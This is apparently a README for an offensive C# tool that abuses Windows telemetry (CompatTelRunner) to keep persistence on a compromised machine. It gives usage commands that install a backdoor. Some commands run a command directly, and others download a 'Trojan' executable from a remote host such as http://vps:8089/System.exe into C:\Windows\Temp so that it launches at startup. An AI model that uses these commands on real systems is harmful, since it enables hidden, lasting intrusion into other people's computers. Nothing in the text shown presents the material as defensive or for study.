WINDOWS TELEMETRY权限维持
TELEMETRY is a C# For Windows PERSISTENCE
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE .Imanfeng Features: Install: - Deployment authority maintains backdoorCommand: TELEMETRY.exe install /command:calc - Execute command without file backdoor TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe - Remotely download Trojan files to the specified directory for backdoor startup TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe - Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup TELEMETRY.exe install /path:C:\Windows\Temp\check.exe - Set path Trojan files for backdoor startup Parameter: /command: - Execute Command /url: - Download FROM /path: - Download To
Telemetry.exe install /command:calc
Telemetry.exe install /url:http://vps:8089/System.exe
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/